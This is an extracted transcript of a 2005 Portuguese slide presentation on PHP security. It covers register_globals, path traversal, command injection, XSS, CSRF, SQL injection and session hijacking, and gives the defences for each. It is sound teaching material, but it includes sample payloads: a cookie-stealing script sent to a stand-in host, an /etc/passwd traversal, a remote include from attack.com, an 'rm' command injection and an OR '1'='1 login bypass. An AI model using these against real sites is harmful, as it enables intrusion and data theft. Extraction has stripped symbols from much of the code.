Seguran - PowerPoint PPT Presentation

1 / 22
About This Presentation
Title:

Seguran

Description:

Seguran a em PHP Exemplos e Casos Pr ticos Nuno Lopes, NEIIST 3 Ciclo de Apresenta es. 17/Mar o/2005 Agenda: Register Globals Paths Cross-Site Scripting ... – PowerPoint PPT presentation

Number of Views:86
Avg rating:3.0/5.0
Slides: 23
Provided by: 5686583
Category:
Tags: mysql | seguran

less

Transcript and Presenter's Notes

Title: Seguran


1
Segurança em PHP
  • Exemplos e Casos Práticos

Nuno Lopes, NEIIST 3º Ciclo de Apresentações.
17/Março/2005
2
Agenda
  • Register Globals
  • Paths
  • Cross-Site Scripting (XSS)
  • Cross-Site Request Forgeries (CSRF)
  • SQL Injection
  • Session Hijacking
  • Links
  • Questões

3
Agenda
  • Register Globals
  • Paths
  • Cross-Site Scripting (XSS)
  • Cross-Site Request Forgeries (CSRF)
  • SQL Injection
  • Session Hijacking
  • Links
  • Questões

4
Register Globals
  • Configuração do PHP insegura
  • Não usar / desactivar !!

script.php?autenticado1
lt? if (user 'user' pass 'pass')
    autenticado true if (autenticado)
    mostra_info_confidencial() ?gt
lt? autenticado false if (_POSTuser
'user' (...)?gt
  • register_globalsOff

5
Agenda
  • Register Globals
  • Paths
  • Cross-Site Scripting (XSS)
  • Cross-Site Request Forgeries (CSRF)
  • SQL Injection
  • Session Hijacking
  • Links
  • Questões

6
Paths
  • Includes perigosos levam a execução remota de
    código
  • Visualização de ficheiros confidenciais

script.php?filehttp//attack.com/script
script.php?file../../../../etc/passwd
lt? readfile(file) ?gt
lt? include "file.inc" //include
"http//attack.com/script.inc" ?gt
  • basename() / dirname()
  • realpath()
  • pathinfo()
  • allow_url_fopenOff

7
Paths
  • Execução de comandos no servidor

script.php?opts-la rm fr
lt? system("ls opts") //system("ls -la rm
fr ") ?gt
  • escapeshellarg()
  • escapeshellcmd()
  • safe_modeOn

8
Paths
  • Roubo de códigos

ltFiles "\.inc"gt Order allow, deny Deny from
all lt/Filesgt
/path/to/secret-stuff (root only) SetEnv
DB_USER "myuser" SetEnv DB_PASS "mypass"
httpd.conf Include "/path/to/secret-stuff"
9
Agenda
  • Register Globals
  • Paths
  • Cross-Site Scripting (XSS)
  • Cross-Site Request Forgeries (CSRF)
  • SQL Injection
  • Session Hijacking
  • Links
  • Questões

10
Cross-Site Scripting (XSS)
  • Inserção de HTML/JavaScript numa página (através
    de variáveis não filtradas)
  • Permite roubo de sessões, passwords, etc..

ltscriptgt document.location 'http//example.org/s
teal_cookies.php?cookie' document.cookie lt/scri
ptgt
  • strip_tags()
  • htmlentities() / htmlspecialchars()

11
Agenda
  • Register Globals
  • Paths
  • Cross-Site Scripting (XSS)
  • Cross-Site Request Forgeries (CSRF)
  • SQL Injection
  • Session Hijacking
  • Links
  • Questões

12
Cross-Site Request Forgeries (CSRF)
"sea surf"
  • Método pouco usado em exploits (por enquanto)
  • Mas muito poderoso e difícil de defender
  • Bastante transversal

imghttp//your.forums/newreply.php?actionnewthr
eadsubjectaaabodysomenaughtywordssubmitgo
/img
ltimg src"http//192.168.0.1/admin/buy_stocks.php?
numberall"gt
13
Cross-Site Request Forgeries (CSRF)
"sea surf"
  • Não há receitas, depende do programa
  • Usar POST em vez de GET
  • Forçar o uso de forms próprios via TOKEN aleatório

14
Agenda
  • Register Globals
  • Paths
  • Cross-Site Scripting (XSS)
  • Cross-Site Request Forgeries (CSRF)
  • SQL Injection
  • Session Hijacking
  • Links
  • Questões

15
SQL Injection
  • Fácil de evitar
  • Filtrar dados por tipo
  • Usar aspas
  • Não mostrar erros (i.e. mysql_error())

16
SQL Injection
script.php?useradmin' OR '1''1pass
lt? sql "SELECT FROM tabela WHERE
user'user' AND pass'pass'" q
mysql_query(sql) or die(mysql_error()) if
(mysql_num_rows(q) 1)     auth true
?gt
SELECT FROM tabela WHERE user'admin' OR
'1''1' AND pass' '
17
SQL Injection
  • Usar cast explícito para inteiros
  • mysql_real_escape_estring()
  • Usar hashes nos códigos (md5()/sha1())
  • Cuidado com wildcards (...LIKE aeiou)
  • Atenção às queries múltiplas

lt? an_int (int) _GET'an_int' if
(an_int lt 0 an_int gt 50)   display_user_erro
r() ?gt
18
Agenda
  • Register Globals
  • Paths
  • Cross-Site Scripting (XSS)
  • Cross-Site Request Forgeries (CSRF)
  • SQL Injection
  • Session Hijacking
  • Links
  • Questões

19
Session Hijacking
  • Roubo de sessões
  • Usar SSL e fazer lock ao IP (e ao certificado do
    cliente)
  • Usar apenas cookies (evita URLs do tipo
    script.php?PHPSESSIDjfh92lpgmc7s6fj e ataques
    pelo HTTP REFERER)

20
Agenda
  • Register Globals
  • Paths
  • Cross-Site Scripting (XSS)
  • Cross-Site Request Forgeries (CSRF)
  • SQL Injection
  • Session Hijacking
  • Links
  • Questões

21
Links
  • www.php.net/security
  • www.phpsec.org
  • www.owasp.org
  • www.securityfocus.com
  • www.phpsecure.info
  • www.net-force.nl
  • http//mega.ist.utl.pt/ncpl/pres/

22
Agenda
  • Register Globals
  • Paths
  • Cross-Site Scripting (XSS)
  • Cross-Site Request Forgeries (CSRF)
  • SQL Injection
  • Session Hijacking
  • Links
  • Questões
Write a Comment
User Comments (0)
About PowerShow.com